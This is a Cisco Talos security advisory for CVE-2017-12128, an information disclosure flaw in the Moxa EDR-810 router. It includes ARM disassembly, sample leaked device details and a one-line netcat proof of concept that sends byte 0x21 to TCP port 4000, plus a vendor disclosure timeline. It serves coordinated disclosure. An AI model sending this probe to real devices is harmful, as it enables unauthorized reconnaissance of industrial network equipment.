Headline
CVE-2017-12128: TALOS-2017-0480 || Cisco Talos Intelligence Group
An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability.
Summary
An exploitable information disclosure vulnerability exists in the Server Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted TCP packet can cause information disclosure. An attacker can send a crafted TCP packet to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
https://www.moxa.com/product/EDR-810.htm
CVSSv3 Score
5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE
CWE-213 - Intentional Information Exposure
Details
If 0x21 is set to the device over TCP/4000 the device will reply with:
!..Model EDR-810-VPN-2GSFP
Name Firewall/VPN Router 05470
Serial No 1324
Firmware Ver. V3.13 build 16051215.
Location Device Location
--------------------------------------------------
LAN Address 192.168.127.254
Netmask 255.255.255.0
Gateway 0.0.0.0
MAC Address 00-90-E8-00-01-02
When the server detects 0x21 it calls the “DoShowInfo” function. This function first gathers system info, then sends it back to the client.
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_128
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aModel ; "Model"
BL sprintf
...
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_640
SUB R3, R3, #0xC
SUB R3, R3, #8
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aName ; "Name"
BL sprintf
...
LDR R2, =aSD_0 ; "%s\t%d\n"
SUB R3, R11, #-var_12
LDRB R1, [R3]
LDRB R3, [R3,#1]
ORR R3, R1, R3,LSL#8
SUB R1, R11, #-s
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aSerialNo ; "Serial No"
...
LDR R2, =aSSS ; "%s\t%s %s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_128
SUB R0, R11, #-var_170
STR R0, [SP,#0x9A4+var_9A4]
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aFirmwareVer_ ; "Firmware Ver."
...
LDR R2, =aSS_0 ; "%s\t%s\n"
SUB R1, R11, #-s
SUB R3, R11, #-var_640
SUB R3, R3, #0xC
SUB R3, R3, #8
ADD R3, R3, #0x29
MOV R0, R1 ; s
MOV R1, R2 ; format
LDR R2, =aLocation ; "Location"
...
BL Get_IF_IP_MASK
SUB R3, R11, #-var_970
SUB R3, R3, #0xC
SUB R3, R3, #4
SUB R2, R11, #-var_130
MOV R0, R3
MOV R1, R2
BL Get_IF_MAC
...
BL net_data_send
Exploit Proof-of-Concept
In order to trigger the information disclosure vulnerability send 0x21 to the device over TCP/4000.
echo -ne '\x21' | nc 127.0.0.1 4000
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Discovered by Carlos Pacho of Cisco Talos.